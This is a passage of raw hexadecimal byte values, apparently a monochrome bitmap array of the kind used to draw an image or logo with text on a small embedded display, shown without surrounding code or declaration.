0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X7F,0XC1,0XFF,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X00,0XF8,0X00,0X0F,0XF0,0X00,0XFF,0X80,0X00,0X7F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X7F,0XE3,0XFF,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XF0,0XFF,0XFE,0X00,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0XF8,0X00,0X07,0XE0,0X01,0XFF,0X80,0X00,0X3F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0X3F,0XE3,0XFE,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XE0,0X7F,0XFF,0X00,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0X78,0X00,0X07,0XE0,0X01,0XFF,0X00,0X00,0X3F,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X1F,0XF3,0XFC,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X1F,0XFF,0X80,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XC0,0X00,0X70,0X00,0X07,0XC0,0X03,0XFF,0X00,0X00,0X1F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X1F,0XFF,0XFC,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X0F,0XFF,0XE0,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X70,0X00,0X03,0XC0,0X03,0XFE,0X00,0X00,0X1F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X0F,0XFF,0XF8,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X03,0XFF,0XF0,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X30,0X00,0X03,0X80,0X03,0XFE,0X00,0X00,0X0F,0XFF,0XC0,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X0F,0XFF,0XF8,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X01,0XFF,0XFC,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XE0,0X00,0X20,0X00,0X01,0X80,0X07,0XFE,0X00,0X00,0X0F,0XFF,0XC0,0X03,
0XFF,0X00,0X00,0X03,0XFC,0X00,0X00,0X1F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X07,0XFF,0XF0,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X7F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X7F,0XFE,0X00,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XF0,0X00,0X20,0X00,0X01,0X80,0X07,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XC0,0X00,0X03,0XFC,0X00,0X00,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X07,0XFF,0XF0,0X00,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X03,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X3F,0XFF,0X80,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XF0,0X00,0X00,0X00,0X01,0X00,0X0F,0XFC,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X03,0XFF,0XE0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X1F,0XFF,0XC0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,0X0E,0XF8,0X00,0X00,0X07,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X03,0XFF,0XE0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X07,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X1C,0X78,0X00,0X00,0X03,0XFF,0XC0,0X03,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X03,0XFF,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X18,0X70,0X00,0X00,0X03,0XFF,0XC0,0X01,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X18,0XF0,0X00,0X40,0X01,0XFF,0XC0,0X00,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X7F,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFC,0X00,0X00,0X10,0X00,0X00,0X38,0X80,0X00,0XC0,0X01,0XFF,0XC0,0X00,
0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFE,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X3F,0XFF,0X80,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFC,0X00,0X00,0X18,0X00,0X00,0X31,0X80,0X00,0XE0,0X00,0XFF,0XC0,0X00,
0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X7F,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFC,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X0F,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFE,0X00,0X00,0X18,0X00,0X00,0X71,0X00,0X00,0XE0,0X00,0XFF,0XC0,0X00,
0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X7F,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XF0,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X07,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X38,0X00,0X00,0X63,0X80,0X01,0XF0,0X00,0X7F,0XC0,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X3E,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XC0,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X01,0XFF,0XFC,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X3C,0X00,0X00,0X63,0X00,0X01,0XF0,0X00,0X7F,0XC0,0X00,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X00,0X00,0X1C,0X00,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFC,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X00,0XFF,0XFE,0X00,0X00,0X3C,0X00,0X00,0XC3,0X00,0X03,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7C,0X00,0X00,0XC6,0X00,0X03,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7E,0X00,0X00,0XC4,0X00,0X07,0XFC,0X00,0X1F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0XFF,0XFF,0X00,0X00,0X7E,0X00,0X01,0X84,0X00,0X07,0XFC,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFE,0X00,0X01,0X88,0X00,0X07,0XF8,0X00,0X3F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFF,0X00,0X03,0XCC,0X00,0X0F,0XF8,0X00,0X7F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0X80,0X00,0XFF,0X00,0X03,0XF8,0X00,0X0F,0XF0,0X00,0X7F,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X7F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF8,0X00,0X1F,0XF0,0X00,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF0,0X00,0X1F,0XE0,0X00,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XC0,0X01,0XFF,0X80,0X07,0XF8,0X00,0X3F,0XE0,0X01,0XFF,0XC0,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X3F,0XFF,0XE0,0X03,0XFF,0XC0,0X0F,0XF8,0X00,0X3F,0XE0,0X01,0XFF,0XC0,0X00,
0X00,0X06,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X1F,0XFF,0XE0,0X03,0XFF,0XC0,0X0F,0XF8,0X00,0X3F,0XC0,0X03,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X1F,0XFF,0XE0,0X07,0XFF,0XC0,0X1F,0XFC,0X00,0X7F,0XC0,0X03,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XF0,0X07,0XFF,0XE0,0X1F,0XFC,0X00,0X7F,0X80,0X07,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XF0,0X07,0XFF,0XE0,0X1F,0XFE,0X00,0XF9,0X80,0X07,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X00,
0X00,0X07,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X01,0XC0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X38,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X01,
0XF8,0X07,0X07,0XE0,0X00,0X0F,0XE0,0X40,0X43,0XC0,0X1F,0XE0,0X00,0X00,0X00,0X7F,
0X02,0X08,0X00,0X00,0X00,0X60,0X07,0XF8,0X00,0X0F,0XC0,0X00,0XFF,0X00,0X04,0X1F,
0X80,0X3F,0X00,0X00,0XFF,0X00,0X00,0X01,0XC1,0XF8,0X00,0X03,0XFC,0X18,0X10,0XF8,
0X03,0XF8,0X38,0X40,0X00,0X00,0X01,0X00,0X1F,0XC0,0X81,0X87,0X80,0X3F,0XC0,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XC0,0X03,
0XFE,0X07,0X1F,0XF8,0X00,0X3F,0XF8,0XE0,0XEF,0XC0,0X7F,0XF8,0X00,0X00,0X01,0XFF,
0XC7,0X1C,0X00,0X18,0X00,0X70,0X1F,0XFF,0X00,0X1F,0XF0,0X03,0XFF,0XC0,0X0E,0X7F,
0XE0,0XFF,0XC0,0X03,0XFF,0XC0,0X00,0X01,0XC7,0XFE,0X00,0X0F,0XFF,0X38,0X39,0XF8,
0X0F,0XFE,0X38,0X70,0X00,0X80,0X03,0X80,0X7F,0XF1,0XC1,0XDF,0X80,0XFF,0XF0,0X00,
0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XC0,0X07,
0X9F,0X07,0X7C,0XFC,0X00,0X7E,0X7E,0XE0,0XEE,0X80,0XFC,0XFC,0X00,0X00,0X07,0XE3,
0XE7,0X0E,0X00,0X38,0X00,0XE0,0X3F,0X3F,0XC0,0X3C,0XF8,0X07,0XE7,0XE0,0X0E,0X79,
0XF1,0XF7,0XE0,0X07,0XE7,0XE0,0X00,0X01,0XCF,0X9F,0X00,0X1F,0X9F,0X98,0X3B,0XB0,
0X3F,0X9F,0X38,0X70,0X01,0XC0,0X07,0X01,0XF8,0XF9,0XC1,0XFD,0X01,0XF9,0XF8,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X07,
0X07,0X07,0XF0,0X1C,0X00,0XF0,0X0F,0XE0,0XF8,0X01,0XE0,0X1E,0X00,0X00,0X0F,0X80,
0X7F,0X0E,0X00,0X38,0X00,0XE0,0X78,0X07,0XC0,0X38,0X38,0X0F,0X00,0XF0,0X0F,0XE0,
0X73,0X80,0XE0,0X0F,0X00,0XF0,0X00,0X01,0XFC,0X07,0X80,0X3C,0X03,0XF8,0X3F,0X00,
0X7C,0X03,0XB8,0X70,0X01,0XC0,0X07,0X03,0XE0,0X1D,0XC1,0XF0,0X03,0XC0,0X3C,0X00,
0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X0F,0XFF,0XC0,0X0E,
0X00,0X07,0XC0,0X0E,0X01,0XC0,0X07,0XE0,0XF0,0X03,0XC0,0X07,0X00,0X00,0X1E,0X00,
0X3F,0X07,0X00,0X7C,0X01,0XC0,0XF0,0X01,0XE0,0X70,0X00,0X1E,0X00,0X78,0X0F,0X80,
0X3F,0X00,0XF0,0X1E,0X00,0X38,0X00,0X01,0XF8,0X03,0X80,0X78,0X00,0XF8,0X3E,0X00,
0X70,0X01,0XF8,0X38,0X03,0XE0,0X0E,0X03,0X80,0X0F,0XC1,0XE0,0X07,0X80,0X1E,0X00,
0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X1F,0XFF,0XC0,0X0E,
0X00,0X07,0XC0,0X0E,0X03,0X80,0X03,0XE0,0XF0,0X03,0X80,0X03,0X80,0X00,0X1C,0X00,
0X1F,0X07,0X00,0X7C,0X01,0XC0,0XE0,0X00,0XF0,0X70,0X00,0X3C,0X00,0X3C,0X0F,0X80,
